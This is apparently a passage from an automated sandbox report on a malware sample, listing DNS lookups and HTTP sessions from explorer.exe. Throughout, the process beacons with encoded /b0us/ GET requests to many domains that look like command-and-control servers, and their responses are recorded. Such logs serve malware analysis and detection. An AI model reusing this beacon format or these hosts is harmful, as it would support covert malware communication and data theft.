                                                      Oct 27, 2021 17:50:36.021222115 CEST8.8.8.8192.168.2.60xfc7cNo error (0)www.bobazzing.combobazzing.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:50:36.021222115 CEST8.8.8.8192.168.2.60xfc7cNo error (0)bobazzing.com34.102.136.180A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:41.348360062 CEST8.8.8.8192.168.2.60x6a6cNo error (0)www.improvfilmproduction.comimprovfilmproduction.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:50:41.348360062 CEST8.8.8.8192.168.2.60x6a6cNo error (0)improvfilmproduction.com50.87.176.30A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:47.240438938 CEST8.8.8.8192.168.2.60xfd5eNo error (0)www.olympiaapartment.com35.186.238.101A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:52.457309961 CEST8.8.8.8192.168.2.60x68d0Name error (3)www.chimichael.comnonenoneA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:57.676028967 CEST8.8.8.8192.168.2.60x3cfaServer failure (2)www.tucows.websitenonenoneA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:02.764975071 CEST8.8.8.8192.168.2.60x783eNo error (0)www.malatirada.commalatirada.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:02.764975071 CEST8.8.8.8192.168.2.60x783eNo error (0)malatirada.com192.0.78.25A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:02.764975071 CEST8.8.8.8192.168.2.60x783eNo error (0)malatirada.com192.0.78.24A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:07.855567932 CEST8.8.8.8192.168.2.60x88adNo error (0)www.finansresultation.com104.21.40.182A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:07.855567932 CEST8.8.8.8192.168.2.60x88adNo error (0)www.finansresultation.com172.67.137.87A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:12.946542025 CEST8.8.8.8192.168.2.60xf537No error (0)www.rxgmarket.com104.21.45.211A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:12.946542025 CEST8.8.8.8192.168.2.60xf537No error (0)www.rxgmarket.com172.67.219.47A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:18.341314077 CEST8.8.8.8192.168.2.60xeab8No error (0)www.joystoreworld.comjoy-store-world.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:18.341314077 CEST8.8.8.8192.168.2.60xeab8No error (0)joy-store-world.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:18.341314077 CEST8.8.8.8192.168.2.60xeab8No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:23.471781969 CEST8.8.8.8192.168.2.60xfe2fNo error (0)www.bbyyn10.xyzbbyyn10.xyzCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:23.471781969 CEST8.8.8.8192.168.2.60xfe2fNo error (0)bbyyn10.xyz142.4.98.67A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:28.887815952 CEST8.8.8.8192.168.2.60x9ce2No error (0)www.inkedbreadcompany.cominkedbreadcompany.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:28.887815952 CEST8.8.8.8192.168.2.60x9ce2No error (0)inkedbreadcompany.com34.102.136.180A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)www.insularrofioa.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.064815044 CEST8.8.8.8192.168.2.60x941cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:44.793246984 CEST8.8.8.8192.168.2.60x6f8Name error (3)www.redeyeops.comnonenoneA (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.bobazzing.com
                                                      • www.improvfilmproduction.com
                                                      • www.olympiaapartment.com
                                                      • www.malatirada.com
                                                      • www.finansresultation.com
                                                      • www.rxgmarket.com
                                                      • www.joystoreworld.com
                                                      • www.bbyyn10.xyz
                                                      • www.inkedbreadcompany.com
                                                      • www.insularrofioa.xyz

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.64976234.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:50:36.047425985 CEST1429OUTGET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1
                                                      Host: www.bobazzing.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:50:36.225481033 CEST1436INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Wed, 27 Oct 2021 15:50:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "61774856-113"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.64979050.87.176.3080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:50:42.019907951 CEST2045OUTGET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1
                                                      Host: www.improvfilmproduction.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:50:42.196352959 CEST2046INHTTP/1.1 404 Not Found
                                                      Date: Wed, 27 Oct 2021 15:50:42 GMT
                                                      Server: Apache
                                                      Content-Length: 315
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.64979635.186.238.10180C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:50:47.258801937 CEST4624OUTGET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1
                                                      Host: www.olympiaapartment.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:50:47.373639107 CEST5749INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Wed, 27 Oct 2021 15:50:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "6175c221-113"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.649802192.0.78.2580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:02.783266068 CEST7472OUTGET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1
                                                      Host: www.malatirada.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:02.800110102 CEST7472INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx
                                                      Date: Wed, 27 Oct 2021 15:51:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 162
                                                      Connection: close
                                                      Location: https://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X
                                                      X-ac: 2.hhn _dfw
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.649815104.21.40.18280C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:07.874152899 CEST7500OUTGET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1
                                                      Host: www.finansresultation.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:07.902292013 CEST7501INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 27 Oct 2021 15:51:07 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 27 Oct 2021 16:51:07 GMT
                                                      Location: https://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xtsbOpdAt06UwAXrS53vqDQTVQjPXF%2Fh7AxN6D%2FoMS7RB7d5EBKii2f2vPoymx%2FAhanGl0LnlQVx19Pr9H6q96ogsKrUYEnkdLSP2Ki72%2FS7p%2F%2BST0DNmwdjXpEGCKSf2LbcL%2BmXsWl8CB4u"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6a4d15823f7442e1-FRA
                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.649829104.21.45.21180C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:12.964931965 CEST7536OUTGET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1
                                                      Host: www.rxgmarket.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:13.296627045 CEST7537INHTTP/1.1 404 Not Found
                                                      Date: Wed, 27 Oct 2021 15:51:13 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6a4d15a21fe05bf1-FRA
                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 78 67 6d 61 72 6b 65 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                      Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      6192.168.2.64983323.227.38.7480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:18.361021996 CEST7546OUTGET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1
                                                      Host: www.joystoreworld.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:18.402849913 CEST7547INHTTP/1.1 403 Forbidden
                                                      Date: Wed, 27 Oct 2021 15:51:18 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Sorting-Hat-PodId: -1
                                                      X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-Dc: gcp-europe-west1
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 6a4d15c3ce834e0e-FRA
                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      7192.168.2.649834142.4.98.6780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:23.665467978 CEST7553OUTGET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1
                                                      Host: www.bbyyn10.xyz
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:23.857836962 CEST7554INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Wed, 27 Oct 2021 15:48:07 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 66 32 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 62 30 75 73 2f 3f 45 52 2d 74 48 6a 52 3d 75 76 78 41 72 52 6b 44 46 51 49 61 37 55 48 35 77 54 7a 57 79 41 47 64 6a 37 58 4b 38 79 77 75 70 77 52 6a 59 57 36 37 7a 41 37 54 6c 43 37 5a 7a 7a 6f 52 66 57 6b 31 78 48 4f 2f 54 4d 6c 2b 6c 49 6c 63 61 36 52 46 4b 77 3d 3d 26 37 6e 42 3d 6f 34 38 58 26 62 74 77 61 66 3d 37 36 31 39 32 33 35 39 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: f2<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X&btwaf=76192359"; </script>0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      8192.168.2.64983534.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:28.908404112 CEST7555OUTGET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1
                                                      Host: www.inkedbreadcompany.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Oct 27, 2021 17:51:29.023747921 CEST7555INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Wed, 27 Oct 2021 15:51:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "61774872-113"
                                                      Via: 1.1 google
                                                      Connection: close
